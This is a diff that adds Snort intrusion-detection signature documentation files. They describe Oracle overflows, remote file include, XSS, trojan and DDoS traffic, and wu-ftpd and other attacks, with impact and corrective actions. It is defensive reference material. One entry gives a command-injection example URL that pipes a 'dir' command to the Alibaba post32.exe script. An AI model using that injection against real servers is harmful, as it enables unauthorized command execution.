+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000452.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000452
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "KAPhotoservice" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "albumid" parameter in the "album.asp" script 
+used by the "KAPhotoservice" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using KAPhotoservice
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000440.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000440
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "CyBoards" application running on a webserver. Access to the file "common.php" using a remote file being passed as the "script_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "script_path" parameter in the "common.php" script used by the "CyBoards" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CyBoards
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2826.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2826
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_for_local_flavor
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2403.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2403
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISS RealSecure and BlackICE products.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the ISS Analysis Module can be triggered
+by an attacker sending a single SMB packet containing an AccountName
+greater than 300 bytes. It is possible for an attacker to exploit this
+condition by sending a specially crafted packet to a host serving network shares.
+
+When the systems running one of the affected ISS products decodes the
+SMB data, exploit code may be included and executed on the machine with 
+system level privileges. Alternatively, the malformed data may cause the service to become 
+unresponsive and cause a DoS condition.
+
+Sensors under attack will display "PAM_internal_error" as a message on
+the console.
+
+Sucessful exploitation of this issue could present an attacker with the 
+opportunity to execute code of their choosing on the target host with system
+privileges. It is also possible for a Denial of Service (DoS) condition to 
+be caused by an attacker attempting to exploit this condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 20.15 through 22.9
+	Real Secure Server Sensor 7.0 XPU 20.16 through 22.9
+	Proventia A Series XPU 20.15 through 22.9
+	Proventia G Series XPU 22.3 through 22.9
+	Proventia M Series XPU 1.3 through 1.7
+	RealSecure Desktop 7.0 eba through ebh
+	RealSecure Desktop 3.6 ebr through ecb
+	RealSecure Guard 3.6 ebr through ecb
+	RealSecure Sentry 3.6 ebr through ecb
+	BlackICE PC Protection 3.6 cbr through ccb
+	BlackICE Server Protection 3.6 cbr through ccb
+
+--
+Attack Scenarios:
+An attacker may use this vulnerability to disable ISS sensors on a
+network or potentially use it to gain control of a machine running one
+of the affected products.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+eEye
+http://www.eeye.com/html/Research/Advisories/AD20040226.html
+
+Bugtraq
+http://www.securityfocus.com/bid/9752
+
+--
--- /dev/null
+++ b/doc/signatures/214.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+214
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "lrk0x".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Linux operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1202.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1202
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2070.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2070
+
+--
+Summary:
+made.
+
+--
+Impact:
+Code execution and possible control of the target machine
+
+--
+Detailed Information:
+Alibaba is a web server that runs on Windows platforms. An error in the 
+cgi script post32.exe allows piped commands to be processed on the 
+server.
+
+--
+Affected Systems:
+Computer Software Manufaktur Alibaba 2.0
+	Microsoft Windows 2000 Workstation
+	Microsoft Windows 95
+	Microsoft Windows 98
+	Microsoft Windows NT 4.0
+   
+--
+Attack Scenarios:
+The attacker merely needs to make an http request to the script using a 
+pipe command at the end of the URI to execute any command he chooses.
+
+For example, http://www.foo.com/cgi-bin/post32.exe|dir%20c:\
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade Alibaba to the latest non vulnerable version if available.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1485
+
+--
--- /dev/null
+++ b/doc/signatures/644.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 644
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing Sparc Solaris/SunOS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS345
+
+--
--- /dev/null
+++ b/doc/signatures/100000572.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000572
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "app_page_caching.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"app_page_caching.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1204.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1204
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Fluid Dynamics Software Corporation
+http://www.xav.com/scripts/axs/help/1508.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000135.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000135
+
+-- 
+Summary: 
+This event is generated when an attempt to exploit a format string attack 
+against the GNU Mailutils imap4d server.
+
+-- 
+
+Impact: 
+A denial of service will occur, and it may be possible to execute arbitrary 
+code with the privileges of the user running the imap server.
+
+--
+Detailed Information:
+The vulnerability is triggered when the request tag contains format string 
+characters. This will cause the server to read and/or write at invalid memory 
+locations, potentially allowing an attacker to execute arbitrary code.
+
+--
+Affected Systems:
+GNU Mailutils 0.5
+GNU Mailutils 0.6
+
+--
+
+Attack Scenarios: 
+Publicly available scripts exist to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, exploit scripts exist.
+
+-- 
+
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Upgrade to version 0.6.90 or higher.
+
+--
+Contributors: 
+Judy Novak <judy.novak@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1964.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1964
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) ToolTalk.
+
+--
+Impact:
+Remote root access. This attack may permit the execution of arbitrary
+commands with the privileges of root.
+
+--
+Detailed Information:
+The ttdbserverd RPC service, more commonly known as the ToolTalk
+database server, allows applications to communicate in the Common
+Desktop Environment (CDE).  The ToolTalk service receives ToolTalk
+messages created and sent by applications and delivers them to the
+appropriate recipient applications.  The ToolTalk database server is
+enabled by default on hosts with CDE.  A function in the code receives
+an argument for a pathname.  If an overly long pathname is passed to the
+function, a buffer overflow may occur, possibly allowing the execution
+of arbitrary commands with the privileges of root.
+
+--
+Affected Systems:
+	HP HP-UX 10.10, 10.20, 10.30, 11.0
+	IBM AIX 4.1, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.2, 4.2.1, 4.3
+	SGI IRIX 5.2, 5.3, 6.0, 6.0.1, 6.2, 6.3, 6.4
+	Sun Solaris 1.1, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.2, 2.0, 2.1, 2.2, 2.3,
+	2.4, 2.5, 2.5.1, 2.6
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where
+ttdbserverd runs.  Alternately, an attacker may attempt to execute the
+exploit code on any listening port in the RPC range if the portmapper is
+blocked.
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000113.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000113
+
+-- 
+Summary: 
+This event is generated when an attacker attempts to execute arbitrary commands 
+on a system running the HappyMall E-Commerce suite.
+
+-- 
+
+Impact: 
+Attackers may run arbitrary commands of their choosing with the permissions of 
+the affected script.
+
+--
+Detailed Information:
+By specifying a value for the "file" parameter of the "member_html.cgi" script 
+that is enclosed by any combination of pipe or semicolon characters, attackers 
+may execute arbitrary commands on the host system with the privileges of the 
+affected script.
+
+--
+Affected Systems:
+HappyCGI HappyMall 4.3
+HappyCGI HappyMall 4.4
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited using a web browser, or an automated script.
+
+-- 
+
+Ease of Attack: 
+Simple, as a web browser or publicly available exploits may be used.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+An unconfirmed patch is available at the URI listed in the Additional 
+References section.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://happymall.happycgi.com/forum/forum_detail.cgi?thread=353
+
+--
--- /dev/null
+++ b/doc/signatures/808.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+808
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/547.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+547
+
+--
+Summary: 
+This event is generated when an attempt is made to create a directory name that begins with a space on an FTP server.
+
+--
+Impact: 
+Unauthorized file storage.  An attacker may attempt to create a directory name that begins with a space on an FTP server, possibly in preparation to store unauthorized files.
+
+
+--
+Detailed Information: 
+An attacker may attempt to create a hidden directory name that begins with a space on an FTP server .  This hidden directory is hard to discover, permitting attackers to store unauthorized "warez" files, such as unlicensed or pirated software.
+
+
+--
+Affected Systems: 
+FTP servers
+
+--
+Attack Scenarios: 
+An attacker may attempt to create a hidden directory name that begins with a space to store unauthorized files.
+
+--
+Ease of Attack: 
+Simple
+
+--
+False Positives: 
+None Known.
+
+--
+False Negatives: 
+Hidden directories other than those with a name that begins with a space may be created to store "warez" files.
+
+--
+Corrective Action: 
+Assign restrictive permissions to all directories so unauthorized users cannot navigate or write to them.
+
+Regularly monitor directories for sudden or drastic increased use of space.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000342.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000342
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DoceboLMS" application running on a webserver. Access to the file "business.php" using a remote file being passed as the "lang" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lang" parameter in the "business.php" script used by the "DoceboLMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DoceboLMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1185.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1185
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/240.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+240
+
+--
+Summary:
+This event is generated when a DDoS Shaft agent communicates with a Shaft handler.  It is also possible that this event may be generated when any host attempts to discover a Shaft handler.   
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a Shaft agent or a host attempting to discover Shaft handlers.  If the listed destination IP is in your network, it may be a Shaft handler.
+
+--
+Detailed Information:
+The Shaft DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Handlers communicate with agents to direct them to launch attacks. An agent may communicate with a handler using a UDP packet to destination port 20433 with a content of "alive".
+
+--
+Affected Systems:
+Any Shaft compromised host.
+
+--
+Attack Scenarios:
+A Shaft agent needs to communicate with a handler before it is given directions to launch an attack. 
+
+--
+Ease of Attack:
+Simple. Shaft code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS256
+
+Miscellaneous:
+http://biocserver.cwru.edu/~jose/shaft_analysis/
+
+
+--
--- /dev/null
+++ b/doc/signatures/345.txt
@@ -0,0 +1,60 @@
+SID:
+345
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible remote execution of commands on the affected server as the root user
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) does not perform proper 
+checking in its SITE EXEC implementation, and allows user input to be 
+sent directly to printf. This allows an attacker to overwrite data and 
+eventually execute code on the server.
+
+--
+
+Affected Systems:
+Any system running wu-ftpd 2.6 .0 or below
+--
+
+Attack Scenarios:
+A remote attacker will attempt to execute commands on the ftp server 
+with root user privileges, over writing or modifying system files. This 
+can be done with anonymous and real user logins.
+--
+
+Ease of Attack:
+Simple, Exploits exist
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to latest version which has fixes for this problem. Maybe even get rid of wu-ftp with something more secure
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/1629.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1629
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+IDS system on the protected network is detected.
+
+--
+Impact:
+These tools may be used to compromise data on the network or may
+indicate mis-use of other IDS systems.
+
+--
+Detailed Information:
+This event indicates the use of an IDS tool. The source of the event
+should be investigated carefully. These tools may be used to gather data
+present in traffic on the protected network.
+
+--
+Affected Systems:
+	All networks.
+
+--
+Attack Scenarios:
+An unathorized user could use an IDS to gather data and observe traffic
+present on the network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1864.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
